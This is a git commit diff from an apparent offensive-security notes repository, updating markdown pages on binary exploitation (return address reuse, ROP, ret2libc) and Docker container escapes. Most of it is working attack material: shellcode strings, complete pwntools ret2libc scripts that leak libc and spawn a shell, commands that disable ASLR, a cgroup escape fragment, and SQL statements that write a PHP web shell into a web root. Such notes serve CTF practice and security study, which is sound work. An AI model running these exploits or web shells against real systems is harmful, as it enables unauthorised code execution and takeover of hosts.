whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bump

This commit is contained in:
whackx 2023-05-03 23:20:31 +02:00
parent 4fde0d92da
commit b15d5ea2ba
5 changed files with 136 additions and 28 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
Exploits/Binaries/Return Address Reuse.md
View File

@ -11,7 +11,9 @@ python -c "print('\x90' * 30 +'\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\
``` ```
## Finding Offset ## Finding Offset
### via gdb segfault output ### via gdb segfault output
* 64 bit addresses use 6 out of 8 byte for addresses. * 64 bit addresses use 6 out of 8 byte for addresses.
```sh ```sh
gdb ./application gdb ./application
@ -41,6 +43,7 @@ pt/metasploit/tools/exploit/pattern_offset -l 180 -q <rbpContent>
``` ```
## Crafting Payload ## Crafting Payload
* Contains Junk/NOPslice + shellcode + Junk over rbp + return address * Contains Junk/NOPslice + shellcode + Junk over rbp + return address
* Inside gdb * Inside gdb
```sh ```sh
@ -62,7 +65,9 @@ run $(python -c "print('A' * 100 + <shellcode> + 'A' * 12 + 'B' * 6)")
[...] [...]
``` ```
* Shellcode starts at `0x7fffffffe2b8 - 4 bytes = 0x7fffffffe2b4`. * Shellcode starts at `0x7fffffffe2b8 - 4 bytes = 0x7fffffffe2b4`.
## NopSled ## NopSled
* Prepend **nopsled** instead of `A` and pick an address inside as the future return address, for example `0x7fffffffe2a8`. * Prepend **nopsled** instead of `A` and pick an address inside as the future return address, for example `0x7fffffffe2a8`.
```sh ```sh
(gdb) x/100x $rsp-200 (gdb) x/100x $rsp-200

1
Exploits/Binaries/Ropping.md
View File

@ -7,6 +7,7 @@
## Example ## Example
### Example 1
```python ```python
from pwn import * from pwn import *

41
Exploits/Binaries/Tips & Tricks.md Normal file
View File

@ -0,0 +1,41 @@
# Tips & Tricks for Binary Exploitations
# Toggle ASLR
State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch.
* Take a look of the current stay via
```sh
sysctl kernel.randomize_va_space
```
Disable ASLR temporarily via
```sh
echo 0 | sudo tee /proc/sys/kernel.randomize_va_space
```
Disable it permanently via
```sh
echo "kernel.randomize_va_space = 0" > /etc/sysctl.d/01-disable-aslr.conf
```
## Keep stdin open
Sometimes input of payloads via stdin pipes cannot be done directly.
If you call an interactive shell in the exploited binary it may not stay open if you pipe the payload as is.
Therefore, the payload should be piped in the following way
```sh
(echo -e 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBu\x06' ; cat ) | ./binary
```
Therein, it is important to use the parameters `-e` and -- depending on the binary `-n` -- for the input being interpeted raw and not as ascii values.
Debug the input via `xxd`
```sh
echo -e '\xde\xad\xc0\xde' | xxd
```
## NULL bytes in Adresses
NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes

73
Exploits/Binaries/ret2libc.md
View File

@ -23,15 +23,28 @@
```sh ```sh
info sharedlibrary info sharedlibrary
``` ```
or statically via ldd
```sh
ldd ./<binary>
```
### Find offsets to gadgets in libc
### Manually
* On target find `sh` address inside libc * On target find `sh` address inside libc
```sh ```sh
strings -a -t x /lib32/libc.so.6 | grep /bin/sh strings -a -t x /lib32/libc.so.6 | grep /bin/sh
``` ```
* Sub from `system` address from inside libc * Sub from `system` address from inside libc
```sh ```sh
readelf -s /lib32/libc.so.6 | grep system readelf -s /lib32/libc.so.6 | grep system | awk '{print $2}'
```
* Pwntools can be used as well
```sh
libc = elf.libc
libc.address = 0x7ff83d8d000
system = libc.sym['system']
bin_sh = next(libc.search(b'/bin/sh'))
``` ```
### Measure the Buffer ### Measure the Buffer
@ -62,7 +75,10 @@ objdump -d <file> | grep ret
* [xct's ropstar](https://github.com/xct/ropstar.git) * [xct's ropstar](https://github.com/xct/ropstar.git)
## Example without ASLR ## Examples
### Example without ASLR
```python ```python
from pwn import * from pwn import *
@ -76,18 +92,18 @@ rop_ret = <found rop ret>
payload = b'A' * <count> payload = b'A' * <count>
payload += b'B' * 8 payload += b'B' * 8
payload += p64(rop_ret)
payload += p64(rop_rdi) payload += p64(rop_rdi)
payload += p64(sh) payload += p64(sh)
payload += p64(0x0) # maybe rop_ret
payload += p64(system) payload += p64(system)
payload += p64(0x0) # end payload
p.recv() p.recv()
p.sendline(payload) p.sendline(payload)
p.interactive() p.interactive()
``` ```
## Example with ASLR ### Example with ASLR
* Create context * Create context
```python ```python
#!/usr/bin/env python3 #!/usr/bin/env python3
@ -100,7 +116,7 @@ rop = ROP(elf)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p = process() p = process()
# ROP I, needed when ASL is enabled # ROP I, needed when ASLR is enabled
payload = b'A' * 18 payload = b'A' * 18
payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0]) payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
payload += p64(elf.got.gets) payload += p64(elf.got.gets)
@ -128,3 +144,46 @@ p.sendline(payload)
p.recvline() p.recvline()
p.interactive() p.interactive()
``` ```
### Example: exploit_me
This is taken from [shoulderhu's gitbook](https://github.com/shoulderhu/gitbook-tryhackme/blob/master/walkthroughs/medium/ret2libc.md)
The libc base is found through a delta of the leaked value and libc gets symbol offset.
```python
from pwn import *
context.binary = binary = './exploit_me'
elf = ELF(binary)
rop = ROP(elf)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
padding = b'A' * 18
payload = padding
payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
payload += p64(elf.got.gets)
payload += p64(elf.plt.puts)
payload += p64(elf.symbols.main)
p = process()
p.recvline()
p.sendline(payload)
p.recvline()
leak = u64(p.recvline().strip().ljust(8, b'\0'))
p.recvline()
log.info(f'Gets leak => {hex(leak)}')
libc.address = leak - libc.symbols.gets
log.info(f'Libc base => {hex(libc.address)}')
payload = padding
payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
payload += p64(next(libc.search(b'/bin/sh')))
payload += p64(rop.find_gadget(['ret'])[0])
payload += p64(libc.symbols.system)
p.sendline(payload)
p.recvline()
p.interactive()
```

44
Exploits/Containers/Docker.md
View File

@ -1,5 +1,22 @@
# Docker Vulnerabilities # Docker Vulnerabilities
## Check if you are inside a container
* Low process count
```sh
ps aux
```
* `.dockerenv` in `/`
```sh
cd / && ls -lah
```
* cgroups contain docker names
```sh
pwd /proc/1
cat cgroups
```
* [Container enumeration](https://github.com/stealthcopter/deepce) * [Container enumeration](https://github.com/stealthcopter/deepce)
## Abusing Registry ## Abusing Registry
@ -49,7 +66,7 @@ dive <IMAGE-ID>
## Escape Container via Exposed Docker Daemon ## Escape Container via Exposed Docker Daemon
* Looking for exposed docker sockets * Looking for exposed docker sockets
```sh ```sh
find / -name "*sock" find / -name "*sock" 2>/dev/null
groups groups
``` ```
@ -97,6 +114,7 @@ chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
``` ```
* The file may appear outside the container on the host system * The file may appear outside the container on the host system
## Check fdisk ## Check fdisk
* `fdisk -l` and `lsblk`, host bulk device may be exposed * `fdisk -l` and `lsblk`, host bulk device may be exposed
@ -144,12 +162,13 @@ Upgrade: tcp
* Login into DB * Login into DB
* Create table * Create table
* Inject PHP code * Inject PHP code
* Select table content intoa file the user can read * Select table content into a file the user can read
* Execute the file * Execute the file
```sql ```sql
create table h4x0r (pwn varchar(1024)); create table h4x0r (pwn varchar(1024));
insert into h4x0r (pwn) values ('<?php $cmd=$_GET[“cmd”];system($cmd);?>'); insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>');
select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php'; select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php';
copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL
``` ```
* curl the webshell hon the exploited host * curl the webshell hon the exploited host
```sh ```sh
@ -166,20 +185,3 @@ https://github.com/dirtycow/dirtycow.github.io
* Least Privileges * Least Privileges
* Seccomp * Seccomp
* Securing Registry via TLS * Securing Registry via TLS
## Checking if you are inside a container
* Low process count
```sh
ps aux
```
* `.dockerenv` in `/`
```sh
cd / && ls -lah
```
* cgroups contain docker names
```sh
pwd /proc/1
cat cgroups
```